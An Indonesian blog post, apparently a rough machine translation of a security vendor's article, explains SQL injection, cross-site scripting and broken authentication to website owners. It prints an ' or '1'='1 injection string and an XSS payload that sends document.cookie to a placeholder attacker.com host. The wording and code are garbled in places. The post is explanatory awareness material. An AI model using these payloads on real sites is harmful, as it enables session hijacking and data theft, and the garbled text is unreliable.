3 CARA PALING POPULER HACKER MERETAS WEBSITE




Apakah itu mencuri data pribadi, mengambil alih komputer Anda, atau mematikan website Anda, hacker dapat berdampak serius bisnis apapun, setiap saat. Defencely telah menjalankan analisis karena itu keberadaan vektor kemungkinan serangan yang berbeda dan karenanya telah terbukti dengan rekor untuk keamanan aplikasi web di India dan saat ini akan global. Ada spesifik ke mana Defencely telah bekerja itu jalan ke membuat nama pada portofolio CIO untuk itu sukses besar dengan Keamanan Informasi Teknologi sebagai penyedia layanan. Untuk sebuah takjub, Defencely tidak hanya berdiri untuk klien itu di masa lalu, tapi sekarang telah menyediakan penelitian tanah-melanggar untuk semua klien itu dengan kiriman khusus yang diberikan layanan dari Defencely telah memilih. Tapi ada sisi, yang Defencely telah memilih untuk memilih untuk kemajuan dunia web, dan itu PUTIH HATE HACKING ETIS yang membuat itu jalan melalui dunia bisnis perusahaan dan menyediakan layanan keamanan yang mendalam untuk perlindungan keamanan web secara keseluruhan untuk itu dihargai klien. Terlepas dari masing-masing layanan yang diberikan oleh Defencely, itu telah mempertahankan standar yang bijaksana ke Bug Hunting dan karenanya keunggulan terbukti untuk kualitas kiriman yang Tim Merah Keamanan Ahli. Tim merah telah mengambil itu tanggung jawab untuk mewakili Defencely di berbagai gratitudes, apakah itu pada menyebarkan kekhawatiran keamanan informasi, menghadiri konferensi keamanan informasi untuk menyediakan gratis tangan industri biaya pada uji penetrasi untuk pendekatan awal dan ini saja telah mengakibatkan pengurangan bijaksana bagaimana keamanan bisa saja menjadi ilusi untuk dunia usaha dan bagaimana bisnis bisa hancur over-malam.

Hacker dapat menyerang dalam banyak hal, tapi di sini adalah sepuluh cara yang paling populer mereka dapat mengancam keamanan situs Anda, dan bisnis Anda:

1. SERANGAN INJEKSI

Menyerang injeksi terjadi ketika ada kekurangan dalam SQL database Anda, perpustakaan SQL, atau bahkan sistem operasi itu sendiri. Karyawan membuka file yang tampaknya kredibel dengan perintah tersembunyi, atau "suntikan", tanpa sadar.

Dalam melakukannya, mereka telah mengizinkan hacker untuk mendapatkan akses tidak sah ke data pribadi seperti nomor jaminan sosial, nomor kartu kredit atau data keuangan lainnya.

TEKNIS INJECTION ATTACK CONTOH:

Sebuah Serangan Injeksi bisa memiliki baris perintah ini:

String query = "SELECT * FROM rekening MANA CustID = '" + request.getParameter ( "id") + "'";

hacker memodifikasi 'id' parameter dalam browser mereka untuk mengirim: 'atau' 1 '=' 1. Hal ini akan mengubah arti dari permintaan untuk mengembalikan semua catatan dari database account untuk hacker, bukan hanya pelanggan dimaksudkan.

2. SERANGAN SITUS SCRIPTING LINTAS

Cross Site Scripting, juga dikenal sebagai serangan XSS, terjadi ketika sebuah aplikasi, url "mendapatkan permintaan", atau paket file dikirim ke jendela browser web dan melewati proses validasi. Setelah script XSS dipicu, itu properti menipu membuat pengguna percaya bahwa halaman dikompromikan dari situs web tertentu adalah sah.

Misalnya, jika www.example.com/abcd.html memiliki skrip XSS di dalamnya, pengguna mungkin melihat jendela popup meminta informasi kartu kredit mereka dan info sensitif lainnya.

TEKNIS Cross Site Scripting CONTOH:

Sebuah contoh yang lebih teknis:

(String) Halaman + = "<input name = 'Credit' value type = 'TEXT' = '" + request.getParameter ( "CC") + "'>";

Penyerang memodifikasi 'CC' parameter di browser mereka untuk:

'> <Script> document.location =' http:? //www.attacker.com/cgi-bin/cookie.cgi Foo = '+ document.cookie </ script>'

Hal ini menyebabkan ID sesi pengguna untuk dikirim ke situs penyerang, yang memungkinkan hacker untuk membajak sesi pengguna saat ini. Itu berarti hacker memiliki akses ke kredensial admin situs dan dapat mengambil kendali penuh atas hal itu. Dengan kata lain, hack.

3. BROKEN AUTHENTIKASI DAN SESI SERANGAN MANAJEMEN

Jika sistem otentikasi pengguna dari situs Anda lemah, hacker dapat mengambil keuntungan penuh.

sistem otentikasi melibatkan password, manajemen kunci, ID sesi, dan cookies yang dapat memungkinkan hacker untuk mengakses akun Anda dari komputer manapun (selama mereka berlaku).

Jika seorang hacker mengeksploitasi sistem otentikasi dan manajemen sesi, mereka dapat mengasumsikan identitas pengguna.

Menakutkan memang.

Tanyakan pada diri sendiri pertanyaan-pertanyaan ini untuk mengetahui apakah website Anda rentan terhadap otentikasi dan manajemen sesi serangan yang rusak:

Apakah kepercayaan pengguna lemah (mis disimpan menggunakan hashing atau enkripsi)?
Dapat kredensial ditebak atau ditimpa melalui fungsi manajemen account yang lemah (misalnya pembuatan account, mengubah password, memulihkan password, lemah sesi ID)?
Apakah session ID diekspos di URL (misal penulisan ulang URL)?
Apakah sesi ID rentan terhadap serangan session fixation?
Apakah session ID timeout dan pengguna dapat log out?
Jika Anda menjawab "ya" untuk semua pertanyaan ini, situs Anda bisa rentan terhadap hacker.

Comments

Popular posts from this blog

SINOPSIS BAHASA JAWA, MATERI

Contoh Deskripsi Panganan Tradisional "Kue Apem" Dalam Bahasa Jawa